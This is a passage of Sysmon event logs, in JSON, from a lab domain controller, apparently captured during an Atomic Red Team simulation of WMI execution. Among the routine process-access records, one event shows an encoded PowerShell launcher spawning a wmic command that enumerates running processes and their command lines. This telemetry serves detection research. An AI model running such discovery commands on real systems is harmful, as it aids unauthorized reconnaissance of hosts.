07:59:13.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5237,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.955","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.971\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 4228\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.971","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"4228","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+43f7|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+15538|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+b920|C:\\Windows\\system32\\wbem\\wbemcore.dll+255ff|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+2685b|C:\\Windows\\system32\\wbem\\wbemcore.dll+22b78|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.971\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.971","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:13","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:13.971\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:13.971","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.055\r\nProcessGuid: {41C8662E-20D2-5F25-0000-001085460800}\r\nProcessId: 4700\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process get caption,executablepath,commandline /format:csv\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.055","ProcessGuid":"{41C8662E-20D2-5F25-0000-001085460800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic process get caption,executablepath,commandline /format:csv\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.049\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001085460800}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dl